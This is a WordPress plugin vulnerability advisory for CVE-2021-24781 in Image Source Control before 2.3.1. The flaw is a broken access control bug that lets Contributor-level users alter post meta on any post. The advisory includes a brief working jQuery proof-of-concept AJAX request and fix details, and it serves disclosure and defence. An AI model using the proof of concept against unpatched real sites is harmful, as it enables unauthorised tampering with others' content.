Image Source Control < 2.3.1 – Contributor+ Arbitrary Post Meta Value Change | CVE 2021-24781 | Plugin Vulnerabilities

Description

The plugin allows users with a role as low as Contributor to change arbitrary post meta fields of arbitrary posts (even those they should not be able to edit)

Proof of Concept

Run while in the Post/Page editor as a contributor

jQuery.post(ajaxurl,{
action: "isc_save_meta",
nonce: iscData.nonce,
id:781,
key: "metadata_change_poc",
value: "meta changed"
})

Affects Plugins

image-source-control-isc

Fixed in 2.3.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2606615/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

3550ba54-7786-4ad9-aeb1-1c0750f189d0

Timeline

Publicly Published

2021-10-04 (about 2 years ago)

Added

2021-10-04 (about 2 years ago)

Last Updated

2022-04-15 (about 2 years ago)

Other

Published

Title

Published

2024-02-19

Title

WPify Woo Czech < 4.0.9 - Missing Authorization

Published

2024-02-27

Title

Under Construction / Maintenance Mode from Acurax <= 2.6 - Information Exposure

Published

2022-09-05

Title

Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload

Published

2021-08-31

Title

WooCommerce Dynamic Pricing & Discounts < 2.4.2 - Unauthenticated Settings Export

Published

2021-07-02

Title

Workreap < 2.2.2 - Missing Authorization Checks in Ajax Actions